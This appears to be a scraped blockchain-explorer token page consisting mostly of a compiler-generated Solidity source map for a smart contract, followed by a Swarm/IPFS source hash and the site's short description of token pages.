16;3151:6;;;;;;;;;;;3132:25;;3176:8;3167:6;;:17;;;;;;;;;;;;;;;;;;3230:8;3199:40;;3220:8;3199:40;;;;;;;;;;;;3122:124;3059:187;:::o;13294:121:1:-;;;;:::o;12588:120::-;;;;:::o;7:99:4:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:307::-;355:1;365:113;379:6;376:1;373:13;365:113;;;464:1;459:3;455:11;449:18;445:1;440:3;436:11;429:39;401:2;398:1;394:10;389:15;;365:113;;;496:6;493:1;490:13;487:101;;;576:1;567:6;562:3;558:16;551:27;487:101;336:258;287:307;;;:::o;600:102::-;641:6;692:2;688:7;683:2;676:5;672:14;668:28;658:38;;600:102;;;:::o;708:364::-;796:3;824:39;857:5;824:39;:::i;:::-;879:71;943:6;938:3;879:71;:::i;:::-;872:78;;959:52;1004:6;999:3;992:4;985:5;981:16;959:52;:::i;:::-;1036:29;1058:6;1036:29;:::i;:::-;1031:3;1027:39;1020:46;;800:272;708:364;;;;:::o;1078:313::-;1191:4;1229:2;1218:9;1214:18;1206:26;;1278:9;1272:4;1268:20;1264:1;1253:9;1249:17;1242:47;1306:78;1379:4;1370:6;1306:78;:::i;:::-;1298:86;;1078:313;;;;:::o;1478:117::-;1587:1;1584;1577:12;1601:117;1710:1;1707;1700:12;1724:126;1761:7;1801:42;1794:5;1790:54;1779:65;;1724:126;;;:::o;1856:96::-;1893:7;1922:24;1940:5;1922:24;:::i;:::-;1911:35;;1856:96;;;:::o;1958:122::-;2031:24;2049:5;2031:24;:::i;:::-;2024:5;2021:35;2011:63;;2070:1;2067;2060:12;2011:63;1958:122;:::o;2086:139::-;2132:5;2170:6;2157:20;2148:29;;2186:33;2213:5;2186:33;:::i;:::-;2086:139;;;;:::o;2231:77::-;2268:7;2297:5;2286:16;;2231:77;;;:::o;2314:122::-;2387:24;2405:5;2387:24;:::i;:::-;2380:5;2377:35;2367:63;;2426:1;2423;2416:12;2367:63;2314:122;:::o;2442:139::-;2488:5;2526:6;2513:20;2504:29;;2542:33;2569:5;2542:33;:::i;:::-;2442:139;;;;:::o;2587:474::-;2655:6;2663;2712:2;2700:9;2691:7;2687:23;2683:32;2680:119;;;2718:79;;:::i;:::-;2680:119;2838:1;2863:53;2908:7;2899:6;2888:9;2884:22;2863:53;:::i;:::-;2853:63;;2809:117;2965:2;2991:53;3036:7;3027:6;3016:9;3012:22;2991:53;:::i;:::-;2981:63;;2936:118;2587:474;;;;;:::o;3067:90::-;3101:7;3144:5;3137:13;3130:21;3119:32;;3067:90;;;:::o;3163:109::-;3244:21;3259:5;3244:21;:::i;:::-;3239:3;3232:34;3163:109;;:::o;3278:210::-;3365:4;3403:2;3392:9;3388:18;3380:26;;3416:65;3478:1;3467:9;3463:17;3454:6;3416:65;:::i;:::-;3278:210;;;;:::o;3494:118::-;3581:24;3599:5;3581:24;:::i;:::-;3576:3;3569:37;3494:118;;:::o;3618:222::-;3711:4;3749:2;3738:9;3734:18;3726:26;;3762:71;3830:1;3819:9;3815:17;3806:6;3762:71;:::i;:::-;3618:222;;;;:::o;3846:619::-;3923:6;3931;3939;3988:2;3976:9;3967:7;3963:23;3959:32;3956:119;;;3994:79;;:::i;:::-;3956:119;4114:1;4139:53;4184:7;4175:6;4164:9;4160:22;4139:53;:::i;:::-;4129:63;;4085:117;4241:2;4267:53;4312:7;4303:6;4292:9;4288:22;4267:53;:::i;:::-;4257:63;;4212:118;4369:2;4395:53;4440:7;4431:6;4420:9;4416:22;4395:53;:::i;:::-;4385:63;;4340:118;3846:619;;;;;:::o;4471:86::-;4506:7;4546:4;4539:5;4535:16;4524:27;;4471:86;;;:::o;4563:112::-;4646:22;4662:5;4646:22;:::i;:::-;4641:3;4634:35;4563:112;;:::o;4681:214::-;4770:4;4808:2;4797:9;4793:18;4785:26;;4821:67;4885:1;4874:9;4870:17;4861:6;4821:67;:::i;:::-;4681:214;;;;:::o;4901:117::-;5010:1;5007;5000:12;5024:117;5133:1;5130;5123:12;5147:117;5256:1;5253;5246:12;5287:568;5360:8;5370:6;5420:3;5413:4;5405:6;5401:17;5397:27;5387:122;;5428:79;;:::i;:::-;5387:122;5541:6;5528:20;5518:30;;5571:18;5563:6;5560:30;5557:117;;;5593:79;;:::i;:::-;5557:117;5707:4;5699:6;5695:17;5683:29;;5761:3;5753:4;5745:6;5741:17;5731:8;5727:32;5724:41;5721:128;;;5768:79;;:::i;:::-;5721:128;5287:568;;;;;:::o;5861:559::-;5947:6;5955;6004:2;5992:9;5983:7;5979:23;5975:32;5972:119;;;6010:79;;:::i;:::-;5972:119;6158:1;6147:9;6143:17;6130:31;6188:18;6180:6;6177:30;6174:117;;;6210:79;;:::i;:::-;6174:117;6323:80;6395:7;6386:6;6375:9;6371:22;6323:80;:::i;:::-;6305:98;;;;6101:312;5861:559;;;;;:::o;6426:329::-;6485:6;6534:2;6522:9;6513:7;6509:23;6505:32;6502:119;;;6540:79;;:::i;:::-;6502:119;6660:1;6685:53;6730:7;6721:6;6710:9;6706:22;6685:53;:::i;:::-;6675:63;;6631:117;6426:329;;;;:::o;6761:118::-;6848:24;6866:5;6848:24;:::i;:::-;6843:3;6836:37;6761:118;;:::o;6885:222::-;6978:4;7016:2;7005:9;7001:18;6993:26;;7029:71;7097:1;7086:9;7082:17;7073:6;7029:71;:::i;:::-;6885:222;;;;:::o;7113:474::-;7181:6;7189;7238:2;7226:9;7217:7;7213:23;7209:32;7206:119;;;7244:79;;:::i;:::-;7206:119;7364:1;7389:53;7434:7;7425:6;7414:9;7410:22;7389:53;:::i;:::-;7379:63;;7335:117;7491:2;7517:53;7562:7;7553:6;7542:9;7538:22;7517:53;:::i;:::-;7507:63;;7462:118;7113:474;;;;;:::o;7593:180::-;7641:77;7638:1;7631:88;7738:4;7735:1;7728:15;7762:4;7759:1;7752:15;7779:320;7823:6;7860:1;7854:4;7850:12;7840:22;;7907:1;7901:4;7897:12;7928:18;7918:81;;7984:4;7976:6;7972:17;7962:27;;7918:81;8046:2;8038:6;8035:14;8015:18;8012:38;8009:84;;;8065:18;;:::i;:::-;8009:84;7830:269;7779:320;;;:::o;8105:180::-;8153:77;8150:1;8143:88;8250:4;8247:1;8240:15;8274:4;8271:1;8264:15;8291:180;8339:77;8336:1;8329:88;8436:4;8433:1;8426:15;8460:4;8457:1;8450:15;8477:233;8516:3;8539:24;8557:5;8539:24;:::i;:::-;8530:33;;8585:66;8578:5;8575:77;8572:103;;;8655:18;;:::i;:::-;8572:103;8702:1;8695:5;8691:13;8684:20;;8477:233;;;:::o;8716:305::-;8756:3;8775:20;8793:1;8775:20;:::i;:::-;8770:25;;8809:20;8827:1;8809:20;:::i;:::-;8804:25;;8963:1;8895:66;8891:74;8888:1;8885:81;8882:107;;;8969:18;;:::i;:::-;8882:107;9013:1;9010;9006:9;8999:16;;8716:305;;;;:::o;9027:224::-;9167:34;9163:1;9155:6;9151:14;9144:58;9236:7;9231:2;9223:6;9219:15;9212:32;9027:224;:::o;9257:366::-;9399:3;9420:67;9484:2;9479:3;9420:67;:::i;:::-;9413:74;;9496:93;9585:3;9496:93;:::i;:::-;9614:2;9609:3;9605:12;9598:19;;9257:366;;;:::o;9629:419::-;9795:4;9833:2;9822:9;9818:18;9810:26;;9882:9;9876:4;9872:20;9868:1;9857:9;9853:17;9846:47;9910:131;10036:4;9910:131;:::i;:::-;9902:139;;9629:419;;;:::o;10054:225::-;10194:34;10190:1;10182:6;10178:14;10171:58;10263:8;10258:2;10250:6;10246:15;10239:33;10054:225;:::o;10285:366::-;10427:3;10448:67;10512:2;10507:3;10448:67;:::i;:::-;10441:74;;10524:93;10613:3;10524:93;:::i;:::-;10642:2;10637:3;10633:12;10626:19;;10285:366;;;:::o;10657:419::-;10823:4;10861:2;10850:9;10846:18;10838:26;;10910:9;10904:4;10900:20;10896:1;10885:9;10881:17;10874:47;10938:131;11064:4;10938:131;:::i;:::-;10930:139;;10657:419;;;:::o;11082:223::-;11222:34;11218:1;11210:6;11206:14;11199:58;11291:6;11286:2;11278:6;11274:15;11267:31;11082:223;:::o;11311:366::-;11453:3;11474:67;11538:2;11533:3;11474:67;:::i;:::-;11467:74;;11550:93;11639:3;11550:93;:::i;:::-;11668:2;11663:3;11659:12;11652:19;;11311:366;;;:::o;11683:419::-;11849:4;11887:2;11876:9;11872:18;11864:26;;11936:9;11930:4;11926:20;11922:1;11911:9;11907:17;11900:47;11964:131;12090:4;11964:131;:::i;:::-;11956:139;;11683:419;;;:::o;12108:221::-;12248:34;12244:1;12236:6;12232:14;12225:58;12317:4;12312:2;12304:6;12300:15;12293:29;12108:221;:::o;12335:366::-;12477:3;12498:67;12562:2;12557:3;12498:67;:::i;:::-;12491:74;;12574:93;12663:3;12574:93;:::i;:::-;12692:2;12687:3;12683:12;12676:19;;12335:366;;;:::o;12707:419::-;12873:4;12911:2;12900:9;12896:18;12888:26;;12960:9;12954:4;12950:20;12946:1;12935:9;12931:17;12924:47;12988:131;13114:4;12988:131;:::i;:::-;12980:139;;12707:419;;;:::o;13132:179::-;13272:31;13268:1;13260:6;13256:14;13249:55;13132:179;:::o;13317:366::-;13459:3;13480:67;13544:2;13539:3;13480:67;:::i;:::-;13473:74;;13556:93;13645:3;13556:93;:::i;:::-;13674:2;13669:3;13665:12;13658:19;;13317:366;;;:::o;13689:419::-;13855:4;13893:2;13882:9;13878:18;13870:26;;13942:9;13936:4;13932:20;13928:1;13917:9;13913:17;13906:47;13970:131;14096:4;13970:131;:::i;:::-;13962:139;;13689:419;;;:::o;14114:224::-;14254:34;14250:1;14242:6;14238:14;14231:58;14323:7;14318:2;14310:6;14306:15;14299:32;14114:224;:::o;14344:366::-;14486:3;14507:67;14571:2;14566:3;14507:67;:::i;:::-;14500:74;;14583:93;14672:3;14583:93;:::i;:::-;14701:2;14696:3;14692:12;14685:19;;14344:366;;;:::o;14716:419::-;14882:4;14920:2;14909:9;14905:18;14897:26;;14969:9;14963:4;14959:20;14955:1;14944:9;14940:17;14933:47;14997:131;15123:4;14997:131;:::i;:::-;14989:139;;14716:419;;;:::o;15141:222::-;15281:34;15277:1;15269:6;15265:14;15258:58;15350:5;15345:2;15337:6;15333:15;15326:30;15141:222;:::o;15369:366::-;15511:3;15532:67;15596:2;15591:3;15532:67;:::i;:::-;15525:74;;15608:93;15697:3;15608:93;:::i;:::-;15726:2;15721:3;15717:12;15710:19;;15369:366;;;:::o;15741:419::-;15907:4;15945:2;15934:9;15930:18;15922:26;;15994:9;15988:4;15984:20;15980:1;15969:9;15965:17;15958:47;16022:131;16148:4;16022:131;:::i;:::-;16014:139;;15741:419;;;:::o;16166:225::-;16306:34;16302:1;16294:6;16290:14;16283:58;16375:8;16370:2;16362:6;16358:15;16351:33;16166:225;:::o;16397:366::-;16539:3;16560:67;16624:2;16619:3;16560:67;:::i;:::-;16553:74;;16636:93;16725:3;16636:93;:::i;:::-;16754:2;16749:3;16745:12;16738:19;;16397:366;;;:::o;16769:419::-;16935:4;16973:2;16962:9;16958:18;16950:26;;17022:9;17016:4;17012:20;17008:1;16997:9;16993:17;16986:47;17050:131;17176:4;17050:131;:::i;:::-;17042:139;;16769:419;;;:::o;17194:114::-;;:::o;17314:364::-;17456:3;17477:66;17541:1;17536:3;17477:66;:::i;:::-;17470:73;;17552:93;17641:3;17552:93;:::i;:::-;17670:1;17665:3;17661:11;17654:18;;17314:364;;;:::o;17684:419::-;17850:4;17888:2;17877:9;17873:18;17865:26;;17937:9;17931:4;17927:20;17923:1;17912:9;17908:17;17901:47;17965:131;18091:4;17965:131;:::i;:::-;17957:139;;17684:419;;;:::o;18109:182::-;18249:34;18245:1;18237:6;18233:14;18226:58;18109:182;:::o;18297:366::-;18439:3;18460:67;18524:2;18519:3;18460:67;:::i;:::-;18453:74;;18536:93;18625:3;18536:93;:::i;:::-;18654:2;18649:3;18645:12;18638:19;;18297:366;;;:::o;18669:419::-;18835:4;18873:2;18862:9;18858:18;18850:26;;18922:9;18916:4;18912:20;18908:1;18897:9;18893:17;18886:47;18950:131;19076:4;18950:131;:::i;:::-;18942:139;;18669:419;;;:::o

Swarm Source

ipfs://c8b0d2a23fc21bf86fa68ae6f89acbed6a1589a5a14c34c34446d45e33a6e69d
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.